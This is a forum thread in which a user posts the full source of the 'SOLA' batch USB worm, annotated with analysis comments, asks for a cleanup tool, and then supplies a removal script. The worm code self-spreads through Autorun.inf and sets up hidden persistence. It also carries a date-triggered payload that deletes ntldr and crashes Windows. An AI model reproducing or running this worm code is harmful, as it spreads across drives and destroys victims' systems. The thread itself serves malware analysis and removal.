标题: Dos病毒,求清理 上一主题 | 下一主题
lena
『楼 主』:  Dos病毒,求清理

首先大家一起鄙视一下这个人渣。

病毒的代码如下:

————————————————————————————————————
@echo off
:: Analysis note: entry point of the "SOLA" batch worm quoted in this post.
:: Everything it installs lives under %systemroot%\Fonts, which is the first
:: place to look when checking a machine for it.
set sola=%systemroot%\Fonts
set setup=%systemroot%\Fonts\solasetup
:: Without the -USB argument the script jumps straight to the resident loop
:: at :Start. NOTE(review): -USB is presumably supplied by the Autorun.inf
:: on an infected drive; that file is not shown on this page.
if not "%1"=="-USB" goto Start
:: With -USB: open the parent folder in a maximised window.
start /max ..
:: %sola%\SOLA.BAT doubles as the "already installed" marker; when it exists
:: the install section below is skipped.
if exist %sola%\SOLA.BAT goto End
::========================Infect==============================
:: Analysis note: install stage. Artifacts created here:
::   %systemroot%\Fonts\solasetup\  (Autorun.inf, SOLA.BAT, the RAR, Tasks.xxx, sleep.exe)
::   %systemroot%\Fonts\svchost.exe (a copy of cmd.exe, see below)
:Infect
cd\
md %systemroot%\Fonts\solasetup
::---- file copy ----
:: Sources are relative paths under sola\ from the root of the current drive.
copy sola\Autorun.inf %setup%\Autorun.inf
copy sola\SOLA.BAT %setup%\SOLA.BAT
copy sola\宅男请进.RAR %setup%\宅男请进.RAR
copy sola\Tasks.xxx %setup%\Tasks.xxx
copy sola\sleep.exe %setup%\sleep.exe
:: Reads the image name of a running svchost.exe from tasklist and stores
:: a copy of cmd.exe under that name in the Fonts folder. A process named
:: svchost.exe whose image path is under Fonts is therefore an indicator
:: of this worm: the name alone does not distinguish it, the path does.
tasklist >%sola%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
copy %systemroot%\system32\cmd.exe %sola%\%svchost%
del %sola%\task.txt

:: Analysis note: persistence. The first attempt is a scheduled task; the
:: fallback is a Startup-folder script. Both locations have to be checked
:: during cleanup.
:Tasks
:: Drops a prebuilt job file as %systemroot%\Tasks\Tasks.job and asks the
:: scheduler to run the task named "Tasks" as NT AUTHORITY\SYSTEM.
copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
goto TaskSuc
:: Fallback when schtasks reports an error: write SOLA.VBS into the
:: All Users Startup folder. The folder name below is the one used by
:: Chinese-language Windows, so the path differs on other locales.
:TaskFail
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
:: The generated VBS runs SOLA.BAT through the renamed cmd.exe copy with
:: window style 0 (hidden).
echo On Error Resume Next>SOLA.VBS
echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS
echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS
copy SOLA.VBS %sola%\SOLA.VBS
:: Marker file: its presence tells the resident loop that the Startup-folder
:: fallback is in use, so the loop re-creates SOLA.VBS there if it is removed.
echo NT>%systemroot%\Fonts\NoTasks

:: Analysis note: the job file is marked system + hidden + read-only, so a
:: default Explorer view or a plain "dir" will not list it; use "dir /a".
:: The TaskFail path above has no goto, so it falls through into this
:: section as well.
:TaskSuc
attrib %systemroot%\Tasks\Tasks.job +s +h +r
:: Installs the worm script as %systemroot%\Fonts\sola.bat and places the
:: bundled sleep.exe in system32, where the resident loop calls it by name.
copy %setup%\sola.bat %sola%\sola.bat
copy %setup%\sleep.exe %systemroot%\system32\sleep.exe

:: Analysis note: stops the Shell Hardware Detection service and imports a
:: .reg file that sets its Start value to 4 (the "disabled" start type), so
:: the service stays off after a reboot. Restoring the service is part of
:: cleanup. The .reg file is left behind as %systemroot%\Fonts\Regedit.reg.
:NoAutoPlay
net stop "Shell Hardware Detection"
echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg
echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg
start regedit /s %systemroot%\Fonts\Regedit.reg

:: Empty section: the label exists but no commands follow it.
:KillTMG

goto End

::======================Infect======================================

::======================Start=======================================

:: Analysis note: resident loop. It never exits; after one pass over drives
:: C: to Z: it waits and jumps back to :Start, so files removed from a drive
:: come back while this process is alive. Cleanup therefore has to end the
:: process before deleting anything.
:Start
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
:: Trigger check: the current date is written to a file with a font-like
:: name in the Fonts folder, and the payload at :DayOn runs when that text
:: contains "-10-01" (1 October on systems whose date format prints -MM-DD).
date /t >%sola%\est_type2032.fon
findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn
:: When the NoTasks marker exists and SOLA.VBS is missing from the Startup
:: folder (the current directory), the script is copied back. The same line
:: is repeated several times inside the drive pass below.
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
:: NOTE(review): nothing visible on this page jumps to :Continue.
:Continue
:: One line per drive letter, C: to Z:, all built from the same template:
::   1. write a probe file <drive>:\solachk1 and read it back; the rest of
::      the line is the body of "if not errorlevel 1", so it only runs when
::      the drive exists and is writable;
::   2. look for the marker string SOLA_1.0 in <drive>:\Autorun.inf;
::   3. when the marker is absent, overwrite Autorun.inf, create
::      <drive>:\SOLA with the contents of the solasetup folder, and set
::      system + hidden + read-only on both.
:: Indicators per drive: a hidden Autorun.inf containing SOLA_1.0 and a
:: hidden SOLA directory in the drive root.
sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1  attrib -s -h -r C:\Autorun.inf&copy /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA&copy /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r
sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1  attrib -s -h -r D:\Autorun.inf&copy /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA&copy /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r
sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1  attrib -s -h -r E:\Autorun.inf&copy /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA&copy /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r
sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1  attrib -s -h -r F:\Autorun.inf&copy /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA&copy /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r
sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1  attrib -s -h -r G:\Autorun.inf&copy /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA&copy /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1  attrib -s -h -r H:\Autorun.inf&copy /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA&copy /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r
sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1  attrib -s -h -r I:\Autorun.inf&copy /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA&copy /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r
sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1  attrib -s -h -r J:\Autorun.inf&copy /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA&copy /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r
sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1  attrib -s -h -r K:\Autorun.inf&copy /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA&copy /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r
sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1  attrib -s -h -r L:\Autorun.inf&copy /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA&copy /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r
sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1  attrib -s -h -r M:\Autorun.inf&copy /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA&copy /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r
sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1  attrib -s -h -r N:\Autorun.inf&copy /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA&copy /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1  attrib -s -h -r O:\Autorun.inf&copy /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA&copy /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r
sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1  attrib -s -h -r P:\Autorun.inf&copy /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA&copy /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r
sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1  attrib -s -h -r Q:\Autorun.inf&copy /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA&copy /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r
sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1  attrib -s -h -r R:\Autorun.inf&copy /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA&copy /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r
sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1  attrib -s -h -r S:\Autorun.inf&copy /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA&copy /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1  attrib -s -h -r T:\Autorun.inf&copy /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA&copy /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r
sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1  attrib -s -h -r U:\Autorun.inf&copy /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA&copy /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r
sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1  attrib -s -h -r V:\Autorun.inf&copy /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA&copy /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r
sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1  attrib -s -h -r W:\Autorun.inf&copy /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA&copy /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r
sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1  attrib -s -h -r X:\Autorun.inf&copy /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA&copy /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r
sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1  attrib -s -h -r Y:\Autorun.inf&copy /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA&copy /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r
sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1  attrib -s -h -r Z:\Autorun.inf&copy /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA&copy /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
%systemdrive%
:: Pause between passes, using the bundled sleep.exe.
:: NOTE(review): the unit of its argument is not stated on this page.
sleep 5000
goto Start

:: Analysis note: date-triggered payload, reached from the "-10-01" check
:: in the resident loop. It deletes %systemdrive%\ntldr and schedules a
:: reboot in 10 seconds with an on-screen message announcing the virus;
:: when shutdown reports an error it falls back to ending csrss.exe, and
:: later winlogon.exe, through ntsd launched via mshta.
:: Impact for responders: a machine that rebooted after this ran has no
:: ntldr in the root of the system drive. NOTE(review): recovery presumably
:: means restoring that file from installation media; the page gives no
:: recovery steps.
:DayOn
attrib %systemdrive%\ntldr +s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的计算机上带有SOLA病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"
sleep 10000
if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"
goto Start
::=====================Start=========================================

:End
::  [Author's note, translated] Without doubt this is a virus, and I am its maker, KAKENHI. Compared with real programming experts my level is far behind; at most I count as a script boy. After some thought I still decided to spread this virus (even though that only shows off my poor work ^_^). Because I am fond of ACG, fellow fans should open "宅男请进.RAR": the antidote is in there.
::  NOTE(review): the claim that the archive holds a remedy cannot be checked from this page. The archive ships with the worm, so treat it as untrusted and remove it with the other files.

——————————————————————————
请大家写一个删除程序。

2008-4-8 20:47
lena
『第 2 楼』:  

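@echo off
:: Removal script for the SOLA batch worm quoted in the first post of this
:: thread. Run it from an administrator account.
::
:: Fixes over the earlier draft:
::   * paths use backslashes (del treats "/sola" as a switch, not a path);
::   * drive letters carry a colon and the loop variable is spelled out;
::   * system/hidden/read-only attributes are cleared before deleting;
::   * all drives C: to Z: are covered, as the worm covers them;
::   * the running worm and its autostart entries are removed first,
::     otherwise its loop copies the files back;
::   * Autorun.inf and the SOLA folder are removed only when they carry
::     the worm's own marker, so unrelated files with those names survive.
setlocal
set "sola=%systemroot%\Fonts"
set "setup=%systemroot%\Fonts\solasetup"

:: 1. Stop the running copy. The worm runs as a copy of cmd.exe named
::    svchost.exe inside the Fonts folder, so the match is on the image
::    path; matching on the name alone would hit the real svchost.exe.
::    If wmic is not available, end that process by hand before going on.
wmic process where "ExecutablePath like '%%\\Fonts\\svchost.exe'" call terminate >nul 2>&1
taskkill /f /im sleep.exe >nul 2>&1

:: 2. Remove the autostart entries: the scheduled task "Tasks" and the
::    SOLA.VBS launcher in the All Users Startup folder. The first path is
::    the Chinese-locale folder name the worm uses; for it to resolve, this
::    file has to be saved in the system ANSI code page. The second path is
::    the English-locale equivalent.
schtasks /delete /tn "Tasks" /f >nul 2>&1
call :Purge "%systemroot%\Tasks\Tasks.job"
call :Purge "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\SOLA.VBS"
call :Purge "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\SOLA.VBS"

:: 3. Remove the installed files under %systemroot%\Fonts and the helper
::    the worm copied into system32.
attrib -s -h -r "%sola%\sola.*" >nul 2>&1
del /f /q /a "%sola%\sola.*" >nul 2>&1
for %%f in (svchost.exe NoTasks Regedit.reg est_type2032.fon task.txt) do call :Purge "%sola%\%%f"
if exist "%setup%" rd /s /q "%setup%"
call :Purge "%systemroot%\system32\sleep.exe"

:: 4. Clean every drive root the worm writes to.
for %%d in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :CleanDrive %%d

:: 5. Not done automatically: the worm disabled the Shell Hardware
::    Detection service. Once all removable media have been cleaned,
::    restore it with
::        sc config ShellHWDetection start= auto
::        net start ShellHWDetection
endlocal
pause
goto :eof

:: Purge <file>: clear system/hidden/read-only, then delete. A missing
:: file is not an error.
:Purge
if not exist "%~1" goto :eof
attrib -s -h -r "%~1" >nul 2>&1
del /f /q /a "%~1"
goto :eof

:: CleanDrive <letter>: remove the worm's Autorun.inf (recognised by the
:: SOLA_1.0 marker the worm itself checks for), its SOLA folder (recognised
:: by SOLA.BAT inside it) and a leftover probe file.
:CleanDrive
if exist "%~1:\Autorun.inf" findstr /C:"SOLA_1.0" "%~1:\Autorun.inf" >nul 2>&1 && call :Purge "%~1:\Autorun.inf"
if exist "%~1:\SOLA\SOLA.BAT" (
  attrib -s -h -r "%~1:\SOLA" >nul 2>&1
  attrib -s -h -r "%~1:\SOLA\*.*" >nul 2>&1
  rd /s /q "%~1:\SOLA"
)
call :Purge "%~1:\solachk1"
goto :eof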

2008-4-8 20:53
lena
『第 3 楼』:  

没人知道吗???

2008-4-8 22:01
abcd
『第 4 楼』:  

唯一评价,实在太啰嗦了。

2008-4-8 22:20